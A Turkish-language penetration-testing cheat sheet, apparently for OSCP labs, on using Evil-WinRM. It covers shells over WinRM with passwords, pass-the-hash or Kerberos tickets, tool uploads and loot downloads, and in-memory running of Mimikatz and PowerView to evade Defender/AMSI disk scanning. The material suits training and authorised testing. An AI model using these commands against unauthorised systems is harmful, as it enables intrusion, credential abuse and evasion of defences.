Evil-WinRM: WinRM Üzerinden İnteraktif Shell, PtH ve Dosya Transferi
WinRM (5985/5986) servisine karsi parola, NTLM hash (PtH) veya Kerberos PKINIT ile interaktif PowerShell shell almak, dosya upload/download yapmak ve Evil-WinRM'in scripts/executables menulerini kullanmak.
- Hedefte WinRM acik (TCP 5985 HTTP / 5986 HTTPS)
- Gecerli kullanici parolasi VEYA NTLM hash VEYA Kerberos ticket
- Kullanici 'Remote Management Users' grubunda veya admin
Komutlar
evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} evil-winrm -i {{RHOST}} -u {{USER}} -H {{NTHASH}} evil-winrm -i {{DC_HOST}} -r {{DOMAIN}} -u {{USER}} evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} -s /opt/scripts/ -e /opt/executables/ evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} -S upload /home/kali/winPEASx64.exe C:\Windows\Temp\winPEAS.exe download C:\Users\{{USER}}\Desktop\proof.txt /home/kali/proof.txt netexec winrm {{RHOST}} -u {{USER}} -p {{PASS}} Genel Bakis
Evil-WinRM, Windows Remote Management (WinRM) servisine karsi Ruby ile yazilmis bir istemcidir. WinRM, TCP 5985 (HTTP) ve 5986 (HTTPS) uzerinde calisir ve interaktif bir PowerShell oturumu verir. OSCP/PG laboratuvarlarinda credential ele gecirildiginde (parola, NTLM hash veya Kerberos ticket) lateral movement ve foothold-to-shell donusumu icin birincil araclardandir.
Kullanicinin shell alabilmesi icin Remote Management Users grubunda olmasi veya local admin olmasi gerekir.
Enumeration / On Kontrol
WinRM acik mi diye port tara ve credential’i once netexec winrm ile dogrula. Cikti (Pwn3d!) iceriyorsa o kullanici shell alabilir; sadece [+] (artisiz) ise kimlik dogrulama gecerli ama WinRM yetkisi yok demektir.
nmap -p5985,5986 {{RHOST}}
Kimlik Dogrulama Yontemleri
- Parola ile:
-u {{USER}} -p {{PASS}} - Pass-the-Hash (PtH):
-H {{NTHASH}}— sadece NT hash kismi verilir (LM kismi gerekmez).aad3b...:onekini dahil etme, sadece NT portion. - Kerberos (PKINIT / ticket): Once
export KRB5CCNAME=/path/ticket.ccache, sonra-r {{DOMAIN}}bayragiyla. Saat senkronu icinntpdate/faketimegerekebilir. - SSL (5986):
-Sbayragi; self-signed sertifikalar icin sorun cikmaz.
Dosya Transferi
Shell prompt icinde upload <local> <remote> ve download <remote> <local> komutlari calisir. Bu, winPEAS, SharpHound, nc.exe gibi araclari hedefe tasimak ve proof.txt/local.txt gibi loot dosyalarini cekmek icin pratiktir. Yollar Windows tarafinda ters slash (\) ile yazilir.
Scripts ve Executables Menusu
-s /opt/scripts/ile belirtilen klasordeki PowerShell.ps1dosyalari menuye yuklenir; isimleriyle cagrilip bellekte (diske dusurmeden) calistirilabilir (or.Invoke-Mimikatz,PowerView).-e /opt/executables/ile.exebinary’leri yuklenir;Invoke-Binary <name.exe> <args>ile bellekten calistirilir.- Bu in-memory calistirma, AMSI/Defender’in diskteki imza taramasini atlatmaya yardimci olur ancak modern AMSI bellek taramasini her zaman atlatmaz; AMSI bypass icin ayri teknik gerekebilir.
Notlar ve Tuzaklar
- Shell varsayilan olarak
Constrained Language Modeveya AMSI ile kisitli olabilir; bazi komutlar bloklanir. menukomutu yuklenen scriptleri/fonksiyonlari listeler.- WinRM, NTLM kullaniyorsa PtH calisir; Kerberos-only ortamda ticket gereklidir.
- Cikti yavaslarsa bu WinRM’in dogasidir; uzun calisan komutlar icin sabredin veya arka planda calistirin.